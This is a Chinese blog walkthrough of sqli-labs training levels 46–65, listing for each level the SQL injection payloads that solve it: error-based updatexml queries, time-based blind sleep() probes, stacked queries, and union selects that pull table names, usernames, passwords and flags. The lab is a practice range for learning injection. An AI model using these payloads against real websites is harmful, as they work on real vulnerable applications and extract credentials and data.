sqli-labs靶场通关技巧(46-65)

最新推荐文章于 2024-02-26 23:46:45 发布
最新推荐文章于 2024-02-26 23:46:45 发布
阅读量431 收藏 1
点赞数 1
分类专栏: sql注入 文章标签: 数据库 mysql 安全漏洞 信息安全 sql
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/ldzhhh/article/details/107770282
版权

Less46

Order by注入,利用报错注入可以爆出数据库信息

暴库:?sort=1 and(updatexml(1,concat(0x7e,(select database())),0));

爆表:?sort=1 and(updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema='security')),0));

爆字段:?sort=1 and(updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name='users')),0));

爆值:?sort=1 and(updatexml(1,concat(0x7e,(select concat(username,'-',password) from users limit 0,1)),0));

 

 

Less47

和less46一样,是order by注入,这里需要用单引号闭合

暴库:?sort=1' and(updatexml(1,concat(0x7e,(select database())),0));--+

爆表:?sort=1' and(updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema='security')),0));--+

爆字段:?sort=1' and(updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name='users')),0));--+

爆值:?sort=1' and(updatexml(1,concat(0x7e,(select concat(username,'-',password) from users limit 0,1)),0));--+

 

 

Less48

Order by注入,数字型的时间盲注

判断名字长度:?sort= 1 and if(length(database())>8,0,sleep(5))--+

暴库:?sort= 1 and if(ascii(substr(database(),1,1))>100, 0, sleep(5))--+

爆表:?sort= 1 and if(ascii(substr((select table_name from information_schema.tables where table_schema='security' limit 0,1),1,1))>100, 0, sleep(5))--+

爆字段:?sort= 1 and if(ascii(substr((select column_name from information_schema.columns where table_name='users' limit 0,1),1,1))>100, 0, sleep(5))--+

爆值:?sort= 1 and if(ascii(substr((select password from security.users limit 0,1),1,1))>100, 0, sleep(5))--+

 

 

Less49

和less48一样,利用时间盲注,不同的是这里是字符型的,需要用单引号闭合 

判断名字长度:?sort= 1 and if(length(database())>8,0,sleep(5))--+

暴库:?sort= 1 ' and if(ascii(substr(database(),1,1))>100, 0, sleep(5))--+

爆表:?sort= 1 ' and if(ascii(substr((select table_name from information_schema.tables where table_schema='security' limit 0,1),1,1))>100, 0, sleep(5))--+

爆字段:?sort= 1 ' and if(ascii(substr((select column_name from information_schema.columns where table_name='users' limit 0,1),1,1))>100, 0, sleep(5))--+

爆值:?sort= 1 ' and if(ascii(substr((select password from security.users limit 0,1),1,1))>100, 0, sleep(5))--+

 

 

Less50

主要考察堆叠注入,也可以用报错注入及时间盲注

Payload:?sort= 1; create table less50 like users;

 

Less51

和less50一样,不同之处在于这里要用单引号闭合

Payload:?sort= 1'; create table less51 like users;

 

Less52

和less50一样,只是少了报错信息而已,所以这关不能用报错注入

 

Less53

和less51一样,只是少了报错信息而已,所以这关不能用报错注入

 

Less54

这关主要目的是找flag,而且限制查询次数为10次

查表:?id=-1' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='challenges'--+

查字段:?id=-1' union select 1,2,group_concat(column_name) from information_schema.columns where table_name='LSAJ0B6O32'--+

拿flag:?id=-1' union select 1,2,secret_9JFP from LSAJ0B6O32--+

 

 

Less55

这关和less54基本一样,不同之处在于这里的id值是用)闭合的,有14次机会

查表:?id=-1) union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='challenges'--+

查字段:?id=-1) union select 1,2,group_concat(column_name) from information_schema.columns where table_name='RBG0H8QAGH'--+

拿flag:?id=-1) union select 1,2,secret_MA84 from RBG0H8QAGH--+

 

 

Less56

这关和前面的一样,不同之处在于这里的id值是用’)闭合的,有14次机会

查表:?id=-1') union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='challenges'--+

查字段:?id=-1') union select 1,2,group_concat(column_name) from information_schema.columns where table_name='TRHM6LHUOA'--+

拿flag:?id=-1') union select 1,2,secret_NNCE from TRHM6LHUOA--+

 

 

Less57

这关和前面的一样,不同之处在于这里的id值是用”闭合的,有14次机会

查表:?id=-1" union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='challenges'--+

查字段:?id=-1" union select 1,2,group_concat(column_name) from information_schema.columns where table_name='JYS4QTFQ1Q'--+

拿flag:?id=-1" union select 1,2,secret_N3CX from JYS4QTFQ1Q--+

 

 

Less58

使用报错注入,有5次机会

查表:?id=1' and(updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema='challenges')),0));--+

查字段:?id=1' and(updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name='SMDG0YXULR')),0));--+

拿flag:?id=1' and(updatexml(1,concat(0x7e,(select secret_IEA6 from SMDG0YXULR)),0));--+

 

 

Less59

这关less58一样,不同之处在于这里的id值是数字型不需闭合,有5次机会

查表:?id=1 and(updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema='challenges')),0));--+

查字段:?id=1 and(updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name='ZL7PTMIQTS')),0));--+

拿flag:?id=1 and(updatexml(1,concat(0x7e,(select secret_H46U from ZL7PTMIQTS)),0));--+

 

Less60

同上,不同之处在于这里的id值是用”)闭合的,有5次机会

查表:?id=1") and(updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema='challenges')),0));--+

查字段:?id=1") and(updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name='J7V35MEKFK')),0));--+

拿flag:?id=1") and(updatexml(1,concat(0x7e,(select secret_V4S2 from J7V35MEKFK)),0));--+

 

 

Less61

同上,不同之处在于这里的id值是用’))闭合的,有5次机会

查表:?id=1')) and(updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema='challenges')),0));--+

查字段:?id=1')) and(updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name='3JN35INZHU')),0));--+

拿flag:?id=1')) and(updatexml(1,concat(0x7e,(select secret_RS9Z from 3JN35INZHU)),0));--+

 

 

Less62

时间盲注,有130次机会

查表:?id=1') and if(ascii(substr((select table_name from information_schema.tables where table_schema='challenges' limit 0,1),1,1))>100, 0, sleep(5))--+

查字段:?id=1') and if(ascii(substr((select column_name from information_schema.columns where table_name='表名' limit 0,1),1,1))>100, 0, sleep(5))--+

拿flag:?id=1') and if(ascii(substr((select 字段名 from 表名 limit 0,1),1,1))>100, 0, sleep(5))--+

 

Less63

这关和less62一样,不同之处在于这里的id值是用’闭合的

 

Less64

同上,不同之处在于这里的id值是用))闭合的

 

Less65

同上,不同之处在于这里的id值是用”)闭合的

 

 

小结

Less46-47  order by注入,报错注入

Less48-49  order by注入,时间盲注

Less50-53 堆叠注入

Less54-57 拿flag,联合查询注入

Less58-61 拿flag,报错注入

Less62-65 拿flag,时间盲注

 

参考链接

https://blog.csdn.net/harrywade/article/details/81842491

 

见痴
关注
  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
sqli-labs-master靶场安装下载
04-01
安装phpstudy、sqli-labs 适合人群:小白 安装sqli-labs报错如何解决
CTFshow-sqli-labs
Leo8283的博客
04-20 653
CTFshow sql-labs刷题记录 1-4 分别用’、"、’)、")闭合,通过联合查询语句union获取flag。由于当前调用的库非存放flag的库,可以用手注,通过元数据库information_schema.schemata表(查找所有库名),information_schema.tables表(查找所有表名),information_schema.columns表查找列名,获取flag最终的位置。 查询所有数据库 union select 1,group_concat(schema_name),
sqli-labs less-6
阿刁〇的博客
03-31 125
文章目录sqli-labs less-6* 判断注入* 判断列数* 查询详细信息 sqli-labs less-6 本关和第5关类似,可以参考第5关 * 判断注入 ?id=1 回显信息为You are in………… ?id=1' 回显正常 ?id=1" 回显错误 ?id=1") 回显正常 故注入类型为字符型,双引号闭合 * 判断列数 ?id=1" order by 3 --+ 回显正常 ?id=1" order by 4 --+ 回显错误 故列数为3 * 查询详细信息 本关同第五关相似,依然采
Sqli-lab闯关
weixin_62281892的博客
05-18 159
第二关 先进行了字符注入,发现分析报错信息不是字符串注入 开始用联合查询判断回显位 查库:在password的显示位3处爆库 查表 查列 查字段,得到flag
VULFOCUS靶场CVE-2020-5504漏洞复现拿flag
u013345705的博客
07-18 2662
VULFOCUS CVE-2020-5504
BUUCTF web部分题(二)
yqdid的博客
04-01 1729
[极客大挑战 2019]EasySQL 这是一道sq 注入题 ,有用户登录界面,根据之前做sqli_labs的经验,先尝试admin账户。 嗯…不出意料 然后我在用户名输入框内尝试sq注入:admin’ or 1=1# 页面无回显,但是没有报错 接着 我试了试order by 语句 发现有报错: 仔细一看 ,发现 报错语句中有“and password=‘admin’ at line 1”; (直觉 )然后我在密码一栏进行注入 :admin' or 1=1 # 由于是恒真语句,所以成功绕过,直接拿到了
sqli-labs靶场练习笔记
11-09
sqli-labs靶场练习笔记,里面有2关 3关 4关 5关 4关 7关 8关 9关 11关 12关 13关 14关 15关 16关 17关 18关 19关 20关 21关 22关 23关 24关 的练习内容,可以供给初学sql注入的学者参考
phpstudy+靶场sqli-labs-master下载
11-08
【标题】"phpstudy+靶场sqli-labs-master下载" 涉及的主要知识点是PHPStudy集成环境和SQL注入漏洞靶场Sqli-Labs。这两个工具是学习和测试Web安全,尤其是SQL注入攻击与防御的重要资源。 PHPStudy是一款集成的PHP...
sqli-labs靶场
最新发布
05-30
sqli-labs靶场中,用户可以实践各种SQL注入技巧,如错误注入、盲注、时间延迟注入等,理解它们的工作原理以及如何避免这些漏洞。靶场通常包含一系列逐步增加难度的挑战,每个挑战都模拟了一个具有特定漏洞的真实...
靶场之DC-1
sunxueer的博客
07-26 625
DC-1靶机环境:1. 打开虚拟机2. 信息收集2.1 nmap扫描存活主机确定DC-1的ip地址2.2 利用namp扫描DC-1开放的端口2.3 访问80端口2.4 寻找Drupal版本信息(多种办法)2.5 寻找此版本Drupal的漏洞2.6 使用漏扫工具OpenVas3. 漏洞利用(CVE-2018-7600)3.1 寻找flag13.2 寻找flag23.3 寻找flag33.4 寻找flag43.5 寻找flag5补充:OpenVas中的CVE-2014-3704也可以做 环境: 靶机名称:DC-
青少年CTF平台---sqli-labs
t235336456的博客
11-30 450
看到有个flag表然后查看段名(id=-1' union select 1,group_concat(column_name),3 from information_schema.columns where table_schema='security' and table_name='flag' --+)查数据(id=-1' union select 1,group_concat(0x7e,flag),3 from security.flag --+)题目:sqli-labs。到4的时候会返回错误信息。
Sqli-labs靶场搭建(适合新手小白围观)
weixin_72543266的博客
09-12 6746
本章是对SQL注入进行一个简单的回归,然后就是对于自己在搭建靶场中所遇到的一些问题的解决办法,以及进行安装步骤的总结,对于自己的自主配置和独立解决问题的能力是一种培养每日一言真正的有福之人,是经历极大的挫折磨难后,依然屹立不倒的人。一个人能承受的东西越多,他所能得到的馈赠才越多。
详细sqli-labs(1-65)通关讲解
热门推荐
m0_67401134的博客
07-30 1万+
如果刚开始接触sql注入,那么sqli-labs这个靶场会很适合你,里面包含了很多的情景,以及我们在sql注入的时候遇到的阻碍。本章将1-65关重点关卡进行详细讲解。代码基本上很全。如果靶场练习完了可以看我这篇SQL注入总结会更好掌握。...
SQL注入从入门到进阶:sqli-labs靶场通关笔记
tzyyyyyy的博客
09-26 5407
SQL注入从入门到进阶:sqli-labs全关通关笔记 Less-1~Less64
基于Sqli-Labs靶场的SQL注入-46~53关
Joker
01-12 635
这一片博客我主要讲解 Order By注入,其实 Order By注入只是把参数变了,其余的操作都和之前参数为ID的时候大同小异,最大的区别就是 Order By注入不能使用Union联合注入。
sqli-labs靶场第46关
weixin_72583035的博客
02-26 260
打开46关利用 order by 后的一些参数进行注入。所以sort=1的意思就是以第一列数据也就是ID进行排序输入sort=2就是以第二列也就是username进行排序输入sort=3就是以第三列也就是password进行排序输入sort=4发现会报错,因为根本没有第四列数据,这也是order by为什么能作为判断字段数的原因从上述可以知道这是为什么order by可以判断字段数的原因我们使用报错注入攻击查看当前库输入?sort=1 and updatexml(1,concat(0x7e,(databas
sqli-labs靶场分析
RestoreJustice的博客
03-18 2361
这里是 基于WAF的一个错误引起的SQL注入,源代码level 29文件夹里有三个php文件,默认访问这个文件夹的index.php但这个文件是没有接入“WAF”的。在测试符号后面添加and sleep(5) --+,如果成功闭合前面的语句,则会执行sleep(5),利用延时注入的原理判断闭合方式。来看看第二种格式,第二种格式除了能像第一种格式一样得到数组内元素的值外,还能得到元素的索引值,并保存到$key变量中,如果数组的索引值未经过人工设定,则返回系统默认的设定值。第一个id的值符合规则,WAF放行。
sqli-labs靶场通关(1-10)
Fly_Mojito的博客
06-11 3555
sqli-labs靶场通关(1-10)
SQLI-labs 通关笔记】靶场安装
fyrmaryt的博客
02-27 586
SQLI-labs通关笔记之安装及介绍篇。
sqli-labs靶场通关
08-25
对于sqli-labs靶场通关,你需要具备一定的SQL注入的知识和技巧。以下是一些通关的步骤和提示: 1. 确保你已经安装了LAMP/WAMP/MAMP服务器环境,并将sqli-labs源码解压到Web服务器的根目录下。 2. 打开浏览器,...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值